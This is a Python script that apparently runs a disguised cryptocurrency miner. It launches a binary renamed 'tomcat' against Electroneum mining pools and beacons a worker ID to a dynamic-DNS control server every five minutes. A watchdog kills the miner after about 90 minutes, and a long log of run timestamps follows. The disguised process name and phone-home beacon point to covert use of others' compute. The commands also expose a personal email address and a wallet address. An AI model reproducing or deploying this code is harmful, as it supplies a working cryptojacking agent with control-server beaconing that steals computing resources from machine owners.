import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:04:01.435092
#2018-02-17 16:51:01.628230
#2018-02-17 18:39:06.598022
#2018-02-17 20:27:05.405025
#2018-02-17 22:13:07.256785
#2018-02-17 23:57:06.220840
#2018-02-18 01:48:06.637785
#2018-02-18 03:37:06.526440
#2018-02-18 05:26:01.756566
#2018-02-18 07:18:04.516208
#2018-02-18 09:06:01.745433
#2018-02-18 10:52:04.026841
#2018-02-18 12:39:05.002402
#2018-02-18 14:26:05.646963
#2018-02-18 16:16:05.678219
#2018-02-18 18:07:03.926505
#2018-02-18 19:53:01.976308
#2018-02-18 21:40:06.019634
#2018-02-18 23:28:06.090815
#2018-02-19 01:15:06.843682
#2018-02-19 03:02:01.432826
#2018-02-19 04:48:05.262706
#2018-02-19 06:34:01.627073
#2018-02-19 08:23:02.200227
#2018-02-19 10:12:08.252465
#2018-02-19 12:01:08.147610
#2018-02-19 13:47:04.821266
#2018-02-19 15:35:08.207276
#2018-02-19 17:22:06.944167
#2018-02-19 19:11:01.808631
#2018-02-19 20:58:07.147435
#2018-02-19 22:46:04.689779
#2018-02-20 00:30:08.838061
#2018-02-20 02:17:05.311146
#2018-02-20 04:08:01.717767
#2018-02-20 05:51:04.382086
#2018-02-20 07:37:01.531105
#2018-02-20 09:21:04.835848
#2018-02-20 11:04:08.615470
#2018-02-20 12:50:09.290481
#2018-02-20 14:35:08.946216
#2018-02-20 16:21:06.744338
#2018-02-20 18:07:08.904281
#2018-02-20 19:57:07.850600
#2018-02-20 21:46:05.049819
#2018-02-20 23:27:06.640541
#2018-02-21 01:12:05.246500
#2018-02-21 02:59:05.344729
#2018-02-21 04:47:05.699598
#2018-02-21 06:38:02.201910
#2018-02-21 08:23:07.557524
#2018-02-21 10:09:01.300529
#2018-02-21 11:58:01.377170
#2018-02-21 13:47:07.102341
#2018-02-21 15:33:02.182152
#2018-02-21 17:22:02.187901
#2018-02-21 19:09:04.735498
#2018-02-21 20:55:07.690294
#2018-02-21 22:41:01.720621
#2018-02-22 00:28:04.574893
#2018-02-22 02:18:05.495244
#2018-02-22 04:03:02.201233
#2018-02-22 05:49:04.729811
#2018-02-22 07:36:01.963764
#2018-02-22 09:24:08.383493
#2018-02-22 11:10:10.812136
#2018-02-22 12:57:08.097504
#2018-02-22 14:45:02.455114
#2018-02-22 16:29:10.230099
#2018-02-22 18:16:05.206512
#2018-02-22 20:08:04.682482
#2018-02-22 21:55:10.771995
#2018-02-22 23:44:05.353932
#2018-02-23 01:33:05.392088
#2018-02-23 03:20:09.329358
#2018-02-23 05:06:04.926155
#2018-02-23 06:51:06.445640
#2018-02-23 08:42:07.604122
#2018-02-23 10:59:07.368345
#2018-02-23 12:54:04.121395
#2018-02-23 14:37:07.707696
#2018-02-23 16:26:07.211592
#2018-02-23 18:14:04.081436
#2018-02-23 19:58:03.638468
#2018-02-23 21:41:03.732692
#2018-02-23 23:35:05.765119
#2018-02-24 01:23:05.498579
#2018-02-24 03:13:04.097169
#2018-02-24 04:58:07.198470
#2018-02-24 06:48:06.690048
#2018-02-24 08:39:07.240617
#2018-02-24 10:23:07.107388
#2018-02-24 12:18:06.291887
#2018-02-24 14:11:05.577318
#2018-02-24 15:58:01.655963
#2018-02-24 17:48:06.811643
#2018-02-24 19:36:05.523696
#2018-02-24 21:23:06.497438
#2018-02-25 00:04:01.967582
#2018-02-25 04:19:05.047148
#2018-02-25 07:49:05.827889